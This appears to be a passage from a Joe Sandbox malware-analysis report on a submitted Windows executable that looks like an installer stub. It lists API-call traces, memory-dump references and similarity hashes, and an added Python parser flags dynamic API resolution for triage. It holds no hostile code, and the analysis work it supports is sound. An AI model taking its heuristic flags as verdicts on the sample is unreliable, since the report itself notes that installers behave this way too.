• GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24C36
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24C54
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24C6E
• FreeLibrary.KERNEL32 ref: 00007FF681C24D50
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24D6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
• Opcode ID: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
• Instruction ID: ed5c0a1e0134091d5d860383f8ecc65d99d8428eb6faa15573619972300cb98b
• Opcode Fuzzy Hash: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
• Instruction Fuzzy Hash: 72516D62A09B91C7EB518B15E8141797BB0FF8EB90FA56279CA4E87794DF3CE409C700
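The entry above is the one behind the report's "Contains functionality to dynamically determine API calls" signature: LoadLibraryA followed by three GetProcAddress calls in a function whose string analysis carries SHELL32.DLL, SHBrowseForFolder and SHGetPathFromIDList. Two things a triager wants from such an entry are the DLL/export names paired with the resolution calls, and the call-site addresses converted from the run's ASLR'd runtime addresses back to image RVAs (ref minus the "Offset:" base of the memory dump) so they can be looked up in a static disassembly. The parser below is an added example, not Joe Sandbox code or output; it assumes only the plain-text layout of the entries on this page, and the excerpt it parses is constructed from the entry above. Note the caveat the result carries: resolving the shell folder-picker APIs at runtime is ordinary behaviour for an installer stub, so the flag is a pointer to where to look, not a verdict on its own.

```python
"""Parse a Joe Sandbox 'Executed Functions' entry and flag dynamic API resolution.

Added example (not Joe Sandbox code). Assumes the plain-text layout used on the
report page: bullet lines under 'APIs', 'Memory Dump Source' and 'Similarity'.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt of the entry on this page (subset of its API lines).
SAMPLE_ENTRY = """\
APIs
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24B9A
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24BBE
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24BDE
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24C05
• GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24C36
• FreeLibrary.KERNEL32 ref: 00007FF681C24D50
Strings
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
"""

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional argument list in parentheses, then "ref: <runtime address>".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*?)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)\s*$"
)
OFFSET_RE = re.compile(r"Offset:\s*(?P<base>[0-9A-F]+)")
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                        # runtime call-site address (ASLR'd, differs per run)
    subcall: Optional[str] = None   # set when the call sits in a callee, not this function


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    image_base: Optional[int] = None  # "Offset:" of the memory dump = module base

    def rva(self, call: ApiCall) -> Optional[int]:
        """Runtime address -> image RVA, so the site can be found in a static disassembly."""
        if self.image_base is None:
            return None
        return call.ref - self.image_base


def parse_entry(text: str) -> FunctionEntry:
    entry = FunctionEntry()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            entry.calls.append(ApiCall(m["name"], m["module"], int(m["ref"], 16), m["sub"]))
            continue
        m = STRING_RE.match(line)
        if m:
            entry.strings.extend(s for s in m["ids"].split("$") if s)   # '$' separates IDs
            continue
        m = OFFSET_RE.search(line)
        if m and entry.image_base is None:
            entry.image_base = int(m["base"], 16)
    return entry


def dynamic_imports(entry: FunctionEntry) -> dict:
    """Flag LoadLibrary* + GetProcAddress in the same function and pair the
    resolution with the DLL / export names the string analysis attached to it.
    A hit is a triage hint only: installer stubs resolve shell APIs this way too."""
    names = {c.name for c in entry.calls if c.subcall is None}
    if not any(n.startswith("LoadLibrary") for n in names) or "GetProcAddress" not in names:
        return {"flagged": False}
    dlls = [s for s in entry.strings if s.upper().endswith(".DLL")]
    exports = [s for s in entry.strings if s not in dlls]
    sites = [entry.rva(c) for c in entry.calls if c.name == "GetProcAddress" and c.subcall is None]
    return {"flagged": True, "dlls": dlls, "exports": exports, "getprocaddress_rvas": sites}


if __name__ == "__main__":
    e = parse_entry(SAMPLE_ENTRY)
    r = dynamic_imports(e)
    print(r["dlls"], r["exports"], [hex(x) for x in r["getprocaddress_rvas"]])
```

For the entry above the three GetProcAddress sites land at RVAs 0x4BBE, 0x4BDE and 0x4C05, which is where to set a breakpoint or read the disassembly in the dumped image to confirm which of the two SHELL32 exports each call resolves. Feeding every entry of the report through the same parser gives a per-function list of resolved imports that the PE import table never shows.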
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharDirectory$NextSystem$CloseEnvironmentExpandOpenQueryStringsUpperValueWindows
                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                          • API String ID: 229715263-2428544900
                                                                                          • Opcode ID: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                                                                                          • Instruction ID: f806252a78c5df6b0e973ceaabe1de2af12cc4e2d2311322d5c7d8226ce4772f
                                                                                          • Opcode Fuzzy Hash: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                                                                                          • Instruction Fuzzy Hash: 68515E72618681C7EB518B10E4442BABBB0FF8AB80FA46139EA5E87794DF7CD545C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                          • String ID: gam$rce.
                                                                                          • API String ID: 2929476258-1562192793
                                                                                          • Opcode ID: 695e6ae24b2fda61812be3d6b4eb2d2880fa2c845b4d1dcc7c30464c9a896a07
                                                                                          • Instruction ID: 8cce30d8186c1aa8b646cdbc9d6222975a3f5f89af5632f515c15374db0c0a15
                                                                                          • Opcode Fuzzy Hash: 695e6ae24b2fda61812be3d6b4eb2d2880fa2c845b4d1dcc7c30464c9a896a07
                                                                                          • Instruction Fuzzy Hash: 8E717C61E08782C7FB518B65E8003F96AA0BF5DB94F246238DE4E97795DE3CE586C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                          • String ID: gam
                                                                                          • API String ID: 3785188418-4248585140
                                                                                          • Opcode ID: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                                                                                          • Instruction ID: 0796f8721de416b32e2e15007d5ef41523c5d342d7aa4551401a660dd83a5aa2
                                                                                          • Opcode Fuzzy Hash: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                                                                                          • Instruction Fuzzy Hash: 2831CD75A08652C7EB509B65E8042B47A71FF8EB61F64B338C91E86394DF7CA589C600
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                          • String ID:
                                                                                          • API String ID: 2168512254-0
                                                                                          • Opcode ID: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
                                                                                          • Instruction ID: aaaaf50545b4404515827e28d430024ce95113ff7cde21518dd7f47c94762582
                                                                                          • Opcode Fuzzy Hash: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
                                                                                          • Instruction Fuzzy Hash: E6512C32604A81CBE7608F61E4941A97BB4FF8DB88F616139DA0E93754DF3DE544CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                                                          • API String ID: 3346862599-1109908249
                                                                                          • Opcode ID: 92574d76233e057d688226138012ae270226e38269e34de28d45b127ba883e32
                                                                                          • Instruction ID: 325f82b5e978d4afe11aa2130427c22885e8c8bf2fbe6a5604f1b10d822fa40c
                                                                                          • Opcode Fuzzy Hash: 92574d76233e057d688226138012ae270226e38269e34de28d45b127ba883e32
                                                                                          • Instruction Fuzzy Hash: B851B032A08A91CBEB508B21E4401B977B4FF8EB50F65613ADA5D83795DF3CE444CB04
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                          • String ID:
                                                                                          • API String ID: 975904313-0
                                                                                          • Opcode ID: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                                                                                          • Instruction ID: 1f0e641c1b5ba5a32acd9a783cf1f32836fe4549148e3a706f7bfe2a7552a77a
                                                                                          • Opcode Fuzzy Hash: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                                                                                          • Instruction Fuzzy Hash: 41716E61A0C6C5C6FF624F64D4103B86BB0BF5EB90F686279CAAE87791CF6CA445C311
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                          • String ID:
                                                                                          • API String ID: 2156179360-0
                                                                                          • Opcode ID: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                                                                                          • Instruction ID: 7e374b65bbd01abc8a089ec1c01929f7c8c4273c9608c996dfdd06a088a167a7
                                                                                          • Opcode Fuzzy Hash: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                                                                                          • Instruction Fuzzy Hash: BF614972A08692CBEB608B15D5056B87BB1FF09794F24A539DE2D93B94DF3CE881C740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CapsDeviceRect$Release
                                                                                          • String ID:
                                                                                          • API String ID: 2212493051-0
                                                                                          • Opcode ID: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                                                                                          • Instruction ID: 5ed4e9501b033fe227d25b5cbb27e64733527967a55c9c7b9e508e03a8f8f935
                                                                                          • Opcode Fuzzy Hash: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                                                                                          • Instruction Fuzzy Hash: F0313A36B24651CBE7108B65E904AADBBB1FB4DB99F696134CE0A93B44CE3CE445CB00
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25220
                                                                                            • Part of subcall function 00007FF681C251F8: SizeofResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25231
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25257
                                                                                            • Part of subcall function 00007FF681C251F8: LoadResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25268
                                                                                            • Part of subcall function 00007FF681C251F8: LockResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25277
                                                                                            • Part of subcall function 00007FF681C251F8: memcpy_s.MSVCRT ref: 00007FF681C25296
                                                                                            • Part of subcall function 00007FF681C251F8: FreeResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C252A5
                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF681C23261), ref: 00007FF681C24085
                                                                                          • LocalFree.KERNEL32 ref: 00007FF681C24108
                                                                                            • Part of subcall function 00007FF681C24F2C: LoadStringA.USER32 ref: 00007FF681C24FBC
                                                                                            • Part of subcall function 00007FF681C24F2C: MessageBoxA.USER32 ref: 00007FF681C24FFC
                                                                                            • Part of subcall function 00007FF681C27958: GetLastError.KERNEL32 ref: 00007FF681C2795C
                                                                                          • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF681C23261), ref: 00007FF681C2412E
                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00007FF681C23261), ref: 00007FF681C2418F
                                                                                            • Part of subcall function 00007FF681C27D28: FindResourceA.KERNEL32 ref: 00007FF681C27D52
                                                                                            • Part of subcall function 00007FF681C27D28: LoadResource.KERNEL32 ref: 00007FF681C27D69
                                                                                            • Part of subcall function 00007FF681C27D28: DialogBoxIndirectParamA.USER32 ref: 00007FF681C27D9F
                                                                                            • Part of subcall function 00007FF681C27D28: FreeResource.KERNEL32 ref: 00007FF681C27DB1
                                                                                          • LocalFree.KERNEL32 ref: 00007FF681C24168
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                          • String ID: <None>$LICENSE
                                                                                          • API String ID: 2414642746-383193767
                                                                                          • Opcode ID: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
                                                                                          • Instruction ID: 9043c33acbc4c10e9439685a4e5373d65841c7acd6ec264bb848cf23f32c86e7
                                                                                          • Opcode Fuzzy Hash: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
                                                                                          • Instruction Fuzzy Hash: CC313472A19652C7F7609F20E8557BA7670FF9D786F706539C90E866A0DFBDA004CB00
APIs
• LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C2625F), ref: 00007FF681C279BB
• LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C2625F), ref: 00007FF681C279CA
• FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C2625F), ref: 00007FF681C27A1A
• FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C2625F), ref: 00007FF681C27A4E
• FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C2625F), ref: 00007FF681C27A67
Strings
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: Resource$Free$FindLoadLock
• String ID: UPDFILE%lu
• API String ID: 3629466761-2329316264
• Opcode ID: 912f736fff6cc648edac57934596fe713f99585f0c6d65f4e9552fedd6e4e983
• Instruction ID: 93159f86b6b466e8df77863aea8fc8245d9c3b35d5a01a4adb9d7bc73ddbcb6f
• Opcode Fuzzy Hash: 912f736fff6cc648edac57934596fe713f99585f0c6d65f4e9552fedd6e4e983
• Instruction Fuzzy Hash: AA319F72A18B41C7EB508B25E4411B9BAB1FF9DF50F65A239DA1E83394CF3CE505C640
APIs
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
• String ID:
• API String ID: 3370778649-0
• Opcode ID: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
• Instruction ID: 8a7daee2c57dd596f1fa1f7d7e888ef5a17d77130e1dba8e59bc9d2829aa9f87
• Opcode Fuzzy Hash: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
• Instruction Fuzzy Hash: 3411F461B09B92C7EB545B62A5041BAAAA0FF4EF81B59A438EE0F83794DE3CD441C600
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
• String ID: wininit.ini
• API String ID: 3273605193-4206010578
• Opcode ID: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
• Instruction ID: 784f72cabd3b9cee75d9b1633c5d1e4b344b3d0af5dd0d3b2b682f39dd5f9b12
• Opcode Fuzzy Hash: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
• Instruction Fuzzy Hash: F0113D32604A81C7E7208B25E4542AAB6B1FFCD715F959235DA5E83664DF3CD549CA00
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: Window$Text$DesktopDialogForegroundItem
• String ID: gam
• API String ID: 761066910-4248585140
• Opcode ID: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
• Instruction ID: e50a283a505d9fd6606dfb4e1cd7cf4ad587c8915f21018fd3108f40a22ad711
• Opcode Fuzzy Hash: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
• Instruction Fuzzy Hash: 9F111EA1E08742CBF7545B61E8092B86A71FF8EB41FB4B138C90E86394DF7CA488C700
APIs
  • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25220
  • Part of subcall function 00007FF681C251F8: SizeofResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25231
  • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25257
  • Part of subcall function 00007FF681C251F8: LoadResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25268
  • Part of subcall function 00007FF681C251F8: LockResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25277
  • Part of subcall function 00007FF681C251F8: memcpy_s.MSVCRT ref: 00007FF681C25296
  • Part of subcall function 00007FF681C251F8: FreeResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C252A5
• LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF681C234BA), ref: 00007FF681C24A7D
• LocalFree.KERNEL32(?,?,?,?,00000000,00007FF681C234BA), ref: 00007FF681C24B19
  • Part of subcall function 00007FF681C24F2C: LoadStringA.USER32 ref: 00007FF681C24FBC
  • Part of subcall function 00007FF681C24F2C: MessageBoxA.USER32 ref: 00007FF681C24FFC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
